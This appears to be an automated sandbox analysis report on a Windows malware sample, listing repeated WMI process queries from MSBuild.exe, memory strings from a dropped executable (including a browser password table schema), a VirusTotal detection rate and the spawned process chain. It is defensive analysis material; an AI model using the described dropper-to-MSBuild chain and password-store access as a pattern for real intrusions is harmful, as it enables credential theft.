Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6196
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u2ts.0.exe, u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u2ts.0.exe, 00000002.00000003.2097967971.00000000220C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: sx8RE6LbG0.exe

Virustotal: Detection: 39%

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File read: C:\Users\user\Desktop\sx8RE6LbG0.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sx8RE6LbG0.exe "C:\Users\user\Desktop\sx8RE6LbG0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2004
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
